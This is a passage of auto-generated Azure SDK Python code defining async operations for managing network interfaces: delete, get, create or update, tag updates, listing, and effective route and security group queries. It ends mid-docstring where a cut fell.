# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations:
"""NetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
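    # Hedged usage sketch (not generated code): with the async
    # NetworkManagementClient this long-running operation is normally driven
    # like so ("my-rg" / "my-nic" are placeholder names):
    #
    #   poller = await client.network_interfaces.begin_delete("my-rg", "my-nic")
    #   await poller.result()   # waits until the delete reaches a terminal state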
async def get(
self,
resource_group_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> "_models.NetworkInterface":
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> AsyncLROPoller["_models.NetworkInterface"]:
"""Creates or updates a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2019_07_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
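    # Hedged sketch (not generated code): create-or-update is also an LRO.  The
    # body follows models.NetworkInterface; a dict of the same shape is usually
    # accepted by the msrest serializer.  subnet_id below is a placeholder.
    #
    #   poller = await client.network_interfaces.begin_create_or_update(
    #       "my-rg", "my-nic",
    #       {"location": "westus",
    #        "ip_configurations": [{"name": "ipconfig1",
    #                               "subnet": {"id": subnet_id}}]})
    #   nic = await poller.result()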
async def _update_tags_initial(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> "_models.NetworkInterface":
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_update_tags(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> AsyncLROPoller["_models.NetworkInterface"]:
"""Updates a network interface tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to update network interface tags.
:type parameters: ~azure.mgmt.network.v2019_07_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_tags_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
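    # Hedged sketch (not generated code): the paging operations return an
    # AsyncItemPaged, so the call itself is not awaited; iterate with async for:
    #
    #   async for nic in client.network_interfaces.list_all():
    #       print(nic.name)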
def list(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
async def _get_effective_route_table_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveRouteListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveRouteListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def begin_get_effective_route_table(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveRouteListResult"]:
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
async def _list_effective_network_security_groups_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> Optional["_models.EffectiveNetworkSecurityGroupListResult"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.EffectiveNetworkSecurityGroupListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
async def begin_list_effective_network_security_groups(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.EffectiveNetworkSecurityGroupListResult"]:
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
